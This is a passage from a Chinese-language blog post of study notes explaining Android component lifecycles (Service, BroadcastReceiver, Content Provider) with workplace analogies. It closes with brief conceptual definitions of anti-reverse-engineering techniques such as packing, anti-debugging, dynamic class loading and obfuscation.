<h3 id="Android-Service-Lifecycle"><a href="#Android-Service-Lifecycle" class="headerlink" title="[[Android Service Lifecycle]]"></a>[[Android Service Lifecycle]]</h3><p>可以把 Service 想象成一个“后台打工人”，它有两种被老板（Activity 等组件）雇佣的模式：</p>
<ol>
<li>临时外包模式（startService）—— “接单干活，自生自灭”</li>
</ol>
<ul>
<li><p><strong>流程</strong>：<code>onCreate</code> (建档) ➔ <code>onStartCommand</code> (开始干活) ➔ <code>onDestroy</code> (走人)。</p>
</li>
<li><p><strong>特点</strong>：老板把任务甩出去就不管了。即使老板自己关门跑路了（Activity 被销毁），打工人依然会在后台把活干完，除非老板明确发话开除（<code>stopService</code>），或者自己干完活下班（<code>stopSelf</code>）。</p>
</li>
</ul>
<ol start="2">
<li>长期雇佣模式（bindService）—— “深度绑定，同生共死”</li>
</ol>
<ul>
<li><p><strong>流程</strong>：<code>onCreate</code> (建档) ➔ <code>onBind</code> (签合同交接) ➔ <code>onUnbind</code> (解约) ➔ <code>onDestroy</code> (走人)。</p>
</li>
<li><p><strong>特点</strong>：老板和打工人建立了长期沟通渠道，可以随时交互数据（比如查看播放器进度）。一旦老板关门跑路（或者主动调用 <code>unbindService</code> 解绑），这层雇佣关系就断了，打工人自动下班销毁。</p>
</li>
</ul>
<p>💡 核心生存法则（混合模式）</p>
<p>如果一个 Service 既被 <code>start</code> 了，又被 <code>bind</code> 了，它就拥有了<strong>双重护身符</strong>。 此时，<strong>必须把两个条件都解除</strong>（既调用了 <code>stopService</code>，又调用了 <code>unbindService</code>），系统才会触发 <code>onDestroy()</code> 真正销毁它。只要其中一个条件还在，它就会一直活在后台。</p>
<h3 id="Android-Broadcast-Receiver-Lifecycle"><a href="#Android-Broadcast-Receiver-Lifecycle" class="headerlink" title="[[Android Broadcast Receiver Lifecycle]]"></a>[[Android Broadcast Receiver Lifecycle]]</h3><p>用最简单的话来概括 <strong>BroadcastReceiver (广播接收器)</strong>，就是四个字：<strong>“阅后即焚”</strong>。</p>
<ul>
<li><p><strong>核心动作：</strong> 听到消息 ➔ 瞬间唤醒（执行 <code>onReceive</code>） ➔ 办完事立刻死亡。它不保留任何记忆。</p>
</li>
<li><p><strong>最大红线：</strong> 寿命只有 <strong>10秒</strong>。绝对不能用它来干下载、请求网络等慢吞吞的重活。</p>
</li>
</ul>
<p>既然咱们聊完了 Android（也是 iApp 底层）最核心的这三个组件，最后给你来个<strong>一句话大汇总</strong>。以后开发 App 时，你需要做什么功能，直接对号入座即可：</p>
<ol>
<li><p><strong>Activity（前台门面）：</strong> 负责抛头露面，陪用户点按交互。状态最多，也最娇贵。</p>
</li>
<li><p><strong>Service（后台车间）：</strong> 负责在用户看不见的地方默默打螺丝、播音乐。只要老板不辞退，它就一直在后台干活。</p>
</li>
<li><p><strong>BroadcastReceiver（传达室大爷）：</strong> 负责竖着耳朵听系统喇叭，听到特定通知（比如没电了、来短信了）就触发个小动作，做完立刻消失。只管传话，不干重活。</p>
</li>
</ol>
<h3 id="Android-Content-Provider-Lifecycle"><a href="#Android-Content-Provider-Lifecycle" class="headerlink" title="[[Android Content Provider Lifecycle]]"></a>[[Android Content Provider Lifecycle]]</h3><p>可以把 Content Provider 想象成一个 App 专属的“对外营业的数据仓库”。</p>
<ul>
<li><p><strong>流程</strong>：<code>onCreate</code> (开张营业) ➔ <code>query/insert</code> (接待客户查阅或存取) ➔ 伴随 App 进程被强制杀掉而关门。</p>
</li>
<li><p><strong>三大特点</strong>：</p>
<ol>
<li><p><strong>开业最早，永不打烊</strong>：它是 App 里醒得最早的组件，一开门就不关，没有销毁方法（没有 <code>onDestroy</code>）。</p>
</li>
<li><p><strong>专门搞外交</strong>：专门负责把 App 内部的数据（比如相册图片、通讯录号码）按规矩共享给其他 App 使用。</p>
</li>
<li><p><strong>能同时接待多人</strong>：因为随时可能有多个 App 一起来查数据，所以它干活（增删改查）都在后台线程池里，必须保证数据不乱套。</p>
</li>
</ol>
</li>
</ul>
<p><strong>一句话总结：</strong> 只有“开张”没有“打烊”，默默为其他 App 提供数据共享服务的跨界大仓库。</p>
<h2 id="Android-App-Development"><a href="#Android-App-Development" class="headerlink" title="Android App Development"></a>Android App Development</h2><h3 id="对抗分析的手段-逆向中可能遇到的一些困难"><a href="#对抗分析的手段-逆向中可能遇到的一些困难" class="headerlink" title="对抗分析的手段-逆向中可能遇到的一些困难"></a>对抗分析的手段-逆向中可能遇到的一些困难</h3><blockquote>
<p>[[加壳]]：在计算机科学和软件安全领域，<strong>“加壳”</strong>（Software Packing）是指将可执行文件（如 <code>.exe</code>、<code>.dll</code>、<code>.apk</code> 等）进行压缩、加密或混淆，并为其附加一段特殊代码（称为“壳”代码或 Stub）的过程。</p>
</blockquote>
<blockquote>
<p>[[反调试]]：<strong>反调试技术</strong>是指程序用来检测自身是否正在被调试器（Debugger，如 x64dbg, OllyDbg, GDB 等）附加、监控或分析的一系列技术手段。一旦程序发现自己处于调试状态，它通常会采取自我保护措施，例如自行退出、崩溃、改变执行逻辑或销毁核心数据。</p>
</blockquote>
<blockquote>
<p>[[动态类加载]]：应用不将所有代码打包在初始Dex中，而是在运行时从服务器、本地文件或内存中动态加载并执行，以此隐藏核心逻辑，增加静态分析的难度。</p>
</blockquote>
<blockquote>
<p>[[代码混淆]]：在编译过程中对类、方法、变量名进行无意义的重命名（如改为a,b,c），并可能插入冗余代码、改变控制流，使得反编译后的代码可读性极差，难以理解其业务逻辑。</p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%80%86%E5%90%91/" rel="tag"># 逆向</a>
              <a href="/tags/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" rel="tag"># 漏洞挖掘</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2026/07/11/%E4%B8%8B%E8%BD%BD%E5%AE%89%E8%A3%85%E5%B9%B6%E4%BD%BF%E7%94%A8obsidian/" rel="prev" title="下载安装并使用obsidian">
                  <i class="fa fa-angle-left"></i> 下载安装并使用obsidian
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Silen1-king</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/mist/" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<canvas id="stars-canvas"></canvas>
<script>
(function() {
  const canvas = document.getElementById('stars-canvas');
  if (!canvas) return;
  const ctx = canvas.getContext('2d');
  let stars = [];
  let shootingStars = [];
  let w, h;

  function resize() {
    w = canvas.width = window.innerWidth;
    h = canvas.height = window.innerHeight;
  }

  function initStars() {
    stars = [];
    const count = Math.floor((w * h) / 3000);
    for (let i = 0; i < count; i++) {
      stars.push({
        x: Math.random() * w,
        y: Math.random() * h,
        r: Math.random() * 1.5 + 0.3,
        alpha: Math.random(),
        dAlpha: (Math.random() * 0.02 + 0.005) * (Math.random() < 0.5 ? 1 : -1)
      });
    }
  }

  function spawnShootingStar() {
    if (shootingStars.length > 2) return;
    shootingStars.push({
      x: Math.random() * w * 0.8,
      y: Math.random() * h * 0.4,
      len: Math.random() * 60 + 40,
      speed: Math.random() * 4 + 4,
      alpha: 1,
      angle: Math.PI / 4 + (Math.random() - 0.5) * 0.3
    });
  }

  function draw() {
    ctx.clearRect(0, 0, w, h);

    // Draw static stars
    for (const s of stars) {
      s.alpha += s.dAlpha;
      if (s.alpha > 1 || s.alpha < 0.1) s.dAlpha = -s.dAlpha;
      ctx.beginPath();
      ctx.arc(s.x, s.y, s.r, 0, Math.PI * 2);
      ctx.fillStyle = `rgba(200, 210, 255, ${s.alpha})`;
      ctx.fill();
    }

    // Draw shooting stars
    for (let i = shootingStars.length - 1; i >= 0; i--) {
      const ss = shootingStars[i];
      const dx = Math.cos(ss.angle) * ss.len;
      const dy = Math.sin(ss.angle) * ss.len;

      const grad = ctx.createLinearGradient(ss.x, ss.y, ss.x - dx, ss.y - dy);
      grad.addColorStop(0, `rgba(255, 255, 255, ${ss.alpha})`);
      grad.addColorStop(1, 'rgba(255, 255, 255, 0)');

      ctx.beginPath();
      ctx.moveTo(ss.x, ss.y);
      ctx.lineTo(ss.x - dx, ss.y - dy);
      ctx.strokeStyle = grad;
      ctx.lineWidth = 1.5;
      ctx.stroke();

      ss.x += Math.cos(ss.angle) * ss.speed;
      ss.y += Math.sin(ss.angle) * ss.speed;
      ss.alpha -= 0.012;

      if (ss.alpha <= 0 || ss.x > w + 100 || ss.y > h + 100) {
        shootingStars.splice(i, 1);
      }
    }

    requestAnimationFrame(draw);
  }

  resize();
  initStars();
  draw();

  window.addEventListener('resize', () => {
    resize();
    initStars();
  });

  // Spawn a shooting star every 3-8 seconds
  setInterval(() => {
    if (Math.random() < 0.7) spawnShootingStar();
  }, 4000);
})();
</script>

<script src="/js/instant-search.js"></script>

</body>
</html>
